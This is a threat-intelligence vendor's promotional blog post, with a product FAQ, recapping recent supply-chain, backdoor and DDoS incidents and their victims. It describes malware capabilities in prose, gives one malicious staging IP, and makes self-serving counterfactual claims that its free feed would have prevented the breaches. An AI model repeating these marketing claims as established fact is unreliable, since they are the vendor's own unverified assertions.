DugganUSA LLC is a cybersecurity company based in Minnesota that builds AI-powered threat intelligence tools. Our platform indexes over 1 million indicators of compromise (IOCs), 400,000+ DOJ Epstein documents, and provides a free STIX 2.1 threat feed consumed by Fortune 500 companies and defense contractors.

Butterbot is DugganUSA's AI-powered security chatbot with 40+ tools for searching IOCs, correlating threat indicators, traversing threat graphs, analyzing behavioral patterns, and running CARVER risk assessments. It uses OpenAI function calling with Meilisearch-backed indexes.

What is AIPM (AI Presence Management)?

AIPM is a tool that audits how AI models (GPT, Claude, Gemini, Perplexity) perceive and recommend your brand. It calculates an AIPM-NPS score by directly querying AI models, analyzes your website structure for AI crawler readiness, and provides optimization recommendations. Think 'SEO for the LLM era.'

Is the Epstein Files search free?

Yes. The Epstein Files Search at epstein.dugganusa.com offers a free tier with 500 queries per day. It covers all 12 DOJ EFTA datasets (400K+ documents), 2M+ ICIJ offshore entities, and 2M+ federal decisions. Professional and enterprise tiers are available for researchers and journalists needing higher limits.

Who founded DugganUSA?

DugganUSA was founded by Patrick Duggan on December 1, 2025, in Minnesota. Patrick's background includes Dell EMC, Palo Alto Networks, and embedded work at Microsoft on JEDI/Azure Stack. The company's D-U-N-S number is 14-363-3562.

What is the DugganUSA STIX feed?

DugganUSA operates a free STIX 2.1 threat intelligence feed at analytics.dugganusa.com/api/v1/stix-feed. It contains 1M+ indicators of compromise including botnet C2s, malicious IPs, and attack infrastructure. The feed is TAXII 2.1 compliant and is consumed by major organizations including Microsoft, AT&T, Amazon, and defense contractors.

Who Got Popped: The Victims We Could Have Saved

Patrick Duggan
Feb 10
3 min read

# Who Got Popped: The Victims We Could Have Saved

**Published:** February 10, 2026

**Author:** Patrick Duggan

The Casualties

This week's threat landscape left bodies. Real organizations. Real data. Real damage.

Here's who got hit - and why it didn't have to happen.

Notepad++ / Chrysalis (Lotus Blossom)

**Attack window:** June - December 2025

**Public disclosure:** February 2, 2026

**Our coverage:** February 2, 2026 (same day)

The Victims

A government organization in the Philippines. A financial organization in El Salvador. An IT service provider in Vietnam. Additional targets in Australia.

A Chinese APT called Lotus Blossom compromised the Notepad++ update infrastructure and pushed a backdoor called Chrysalis to "fewer than two dozen" highly targeted machines.

Government. Finance. Critical IT.

The backdoor supports persistence via service creation, can spawn reverse shells, transfer files, and fully remove itself when done.

dYdX / Shai-Hulud 2.0 (npm Supply Chain)

**Attack window:** July 2025 - January 2026

**Downloads:** 121,539 across 128 trojanized packages

What They Stole

581 GitHub Personal Access Tokens. 386 GitHub OAuth Tokens. 104 GitHub Fine-Grained PATs. 101 GitLab Tokens.

That's 1,172 developer credentials harvested from one campaign.

If the malware couldn't steal credentials, it attempted to destroy the victim's entire home directory by securely overwriting and deleting every writable file.

PostHog was specifically mentioned as impacted by the spread.

EtherHiding npm Packages

**Disclosed:** February 8, 2026

**Our coverage:** December 28, 2025 (six weeks early)

54 malicious npm packages using Ethereum smart contracts as C2 dead drops.

The technique makes takedowns impossible. You can't seize an Ethereum smart contract.

We published the staging IP (193.24.123.68) and the detection logic ("hunt for Ethereum RPC traffic from web servers") six weeks before the mainstream coverage.

AISURU/Kimwolf DDoS (31.4 Tbps)

**Record-setting attack:** November 2025

**Botnet size:** 2-4 million compromised Android devices

Hong Kong jumped to the second most DDoS'd location on earth. The United Kingdom jumped 36 places to number six. Telecom, gaming, and generative AI companies were primary targets.

The "Night Before Christmas" campaign starting December 19 averaged 4 Tbps per attack.

The Counterfactual

What if these organizations had been consuming our feed?

**Chrysalis:** We had same-day coverage. They would have had IOCs to block before lateral movement completed.

**EtherHiding:** We had it six weeks early. They would have had 193.24.123.68 blocked and RPC detection deployed before the npm packages even shipped.

**Shai-Hulud 2.0:** We named the worm. Pattern 38 detection would have flagged trojanized packages.

**DPRK tradecraft:** Ongoing coverage. Blockchain C2 detection before it spread.

The Philippines government organization that got hit by Chrysalis? The El Salvador financial institution? The Vietnamese IT provider?

If they had our STIX feed, they would have had detection guidance before public disclosure.

The dYdX developers who lost 581 GitHub PATs? Our December Shai-Hulud coverage included the exact persistence mechanisms and exfiltration patterns.

The Cost Comparison

Enterprise threat intel platforms cost $50,000 to $500,000 per year. Curated. Delayed. Behind an NDA.

Our STIX feed costs nothing. Real-time. 1,671 malicious IPs. 256 botnet C2s. Free.

Our blog costs nothing. Detection guidance, IOCs, context. Free.

Our search API costs nothing. 329,442 documents indexed. Free.

The Philippines government org didn't need a half-million dollar Recorded Future contract.

They needed to hit analytics.dugganusa.com/api/v1/stix-feed.

That's it. Free. No authentication. Machine-readable.

Get Protected Now

STIX 2.1 Feed: analytics.dugganusa.com/api/v1/stix-feed

Search API: analytics.dugganusa.com/api/v1/search

Epstein Files: epstein.dugganusa.com

Current coverage: 1,671 malicious IPs, 256 botnet C2s, 1,151 indicators in the last 24 hours, 329,442 documents indexed.

No paywall. No enterprise contract. No sales call.

Just the feed.

The Bottom Line

Organizations got compromised this month because they didn't have threat intel.

Not because threat intel didn't exist.

Not because it was too expensive.

Because nobody told them the best feed in the world is free.

Now you know.

*DugganUSA LLC - $75/month infrastructure. Free to the world.*

*"The feed exists. Use it."*

*Her name was Renee Nicole Good.*

*His name was Alex Jeffery Pretti.*